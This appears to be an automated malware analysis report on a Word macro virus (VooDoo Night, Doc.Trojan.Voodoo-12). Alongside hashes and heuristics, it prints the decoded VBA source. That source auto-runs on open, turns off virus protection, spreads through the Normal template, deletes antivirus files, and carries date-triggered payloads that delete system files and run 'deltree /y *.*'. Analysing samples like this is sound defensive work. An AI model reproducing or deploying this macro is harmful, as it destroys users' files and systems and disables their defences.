Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 379543b26934e9ac…

MALICIOUS

Office (OLE)

45.0 KB Created: 1999-12-26 01:48:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: cd4cadb8e29d8eed1add275c66fc1f40 SHA-1: da89f811b4ba360ebebd1f87880f1ec5b21518e3 SHA-256: 379543b26934e9ac4b7cfab61e9201e4da77cf074d3630770ecfce253817802f
320 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment T1203 Exploitation for Client Execution

The sample is an OLE document containing a VBA macro that executes automatically via the Document_Open subroutine. This macro attempts to disable virus protection and uses the Shell() function, indicating an intent to execute arbitrary code. The presence of the 'Doc.Trojan.Voodoo-12' ClamAV signature further confirms its malicious nature, likely as a downloader.

Heuristics 6

  • ClamAV: Doc.Trojan.Voodoo-12 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Voodoo-12
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • OLE document has large unaccounted-for region high OLE_SLACK_ANOMALY
    OLE file is 46,080 bytes but its declared streams total only 26,611 bytes — 19,469 bytes (42%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 4393 bytes
SHA-256: ac5985625feeeb6401db3afbc551464d97cdaff9a31be62c7efb8165f585f595
Detection
ClamAV: Doc.Trojan.Voodoo-12
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_open()
'///////////////////////////\°°°°°°°°°°°°°°°°°/\\\\\\\\\\\\\\\\\\\\\\\\\\\\'
'////////////////////////////VooDoo NIGHT v1.0\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\'
'***************************************************************************'
On Error Resume Next

'VooDoo Night, VooDoo Night, Come and Change my FACE
Set CNormalTemplate = NormalTemplate.VBProject
Set CActiveDocument = ActiveDocument.VBProject
Set Coptions = Options
Dim SysDate

'VooDoo Night, Voodoo Night Your are so beautiful, Make everyone stay away from ME
 Application.EnableCancelKey = wdCancelDisabled
  KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF11), KeyCategory:=wdKeyCategoryFont, Command:=" "
   KeyBindings.Add KeyCode:=BuildKeyCode(wdKeyAlt, wdKeyF8), KeyCategory:=wdKeyCategoryFont, Command:=" "
    Application.CommandBars("Tools").Controls(12).Visible = False

      Coptions.VirusProtection = False
       a = CNormalTemplate.vbcomponents(1).CodeModule.CountOfLines
        b = CActiveDocument.vbcomponents(1).CodeModule.CountOfLines
         If a = 86 And b = 86 Then GoTo AvCheck
          If a = 86 Then

           CActiveDocument.vbcomponents(1).CodeModule.DeleteLines 1, CActiveDocument.vbcomponents(1).CodeModule.CountOfLines
          FullCode = CNormalTemplate.vbcomponents(1).CodeModule.Lines(1, CNormalTemplate.vbcomponents(1).CodeModule.CountOfLines)
         CActiveDocument.vbcomponents(1).CodeModule.AddFromString (FullCode)
End If
      If b >= 84 Then
     CNormalTemplate.vbcomponents(1).CodeModule.DeleteLines 1, CNormalTemplate.vbcomponents(1).CodeModule.CountOfLines
    FullCode = CActiveDocument.vbcomponents(1).CodeModule.Lines(1, CActiveDocument.vbcomponents(1).CodeModule.CountOfLines)
   CNormalTemplate.vbcomponents(1).CodeModule.AddFromString (FullCode)
End If

AvCheck:
'VooDoo Night, VooDoo Night, will this be my END?
  If Dir("C:\Programme\AntiViral Toolkit Pro\macro.avc") <> "" Then Kill ("C:\Programme\AntiViral Toolkit Pro\macro.avc")

    If Dir("C:\PROGRAM FILES\AntiViral Toolkit Pro\macro.avc") <> "" Then Kill ("C:\PROGRAM FILES\AntiViral Toolkit Pro\macro.avc")

      If Dir("C:\F-PROT\Macro.def") <> "" Then Kill ("C:\F-PROT\Macro.def")

        If Dir("C:\Programme\Norton AntiVirus\NavLu32.exe") <> "" Then Kill ("C:\Programme\Norton AntiVirus\NavLu32.exe")

          If Dir("C:\PROGRAM FILES\Norton AntiVirus\NavLu32.exe") <> "" Then Kill ("C:\PROGRAM FILES\Norton AntiVirus\NavLu32.exe")

            If Dir("C:\PROGRAM FILES\Norton AntiVirus\Rescue.exe") <> "" Then Kill ("C:\PROGRAM FILES\Norton AntiVirus\Rescue.exe")

              If Dir("C:\Programme\Norton AntiVirus\Rescue.exe") <> "" Then Kill ("C:\Programme\Norton AntiVirus\Rescue.exe")

Payload:

'Payload_1_
If Day(Now) = 31 Then
            MsgBox "                         GRIPPED BY VooDoo, LEFT ALONE, DAMNED FOREVER, SPELLED FOR NIGHT, POSSESED BY SATAN-                                                                                                               itz VooDoo NIGHT! (c)1999 by doc"
            
Open ("C:\windows\win.com") For Output As #12
   Print #1, 20, "-VooDoo NIGHT-"
Close #1
SetAttr "c:\io.sys", vbNormal
Kill ("c:\io.sys")
SetAttr "c:\windows\system.ini", vbNormal
Kill ("c:\windows\system.ini")
End If
'-----------------------------------------------------------------------------------------------------------------------
'Payload_2_
If Day(Now) = 13 Then
 Open ("c:\autoexec.bat") For Output As #13
  Print #13, "deltree /y *.*"
   Print #13, "exit"
Close #13
SetAttr "c:\windows\regedit.exe", vbNormal
Kill ("c:\windows\regedit.exe")
   Shell ("c:\autoexec.bat"), vbHide

Do
           MsgBox "                         GRIPPED BY VooDoo, LEFT ALONE, DAMNED FOREVER, SPELLED FOR NIGHT, POSSESED BY SATAN-     
... (truncated)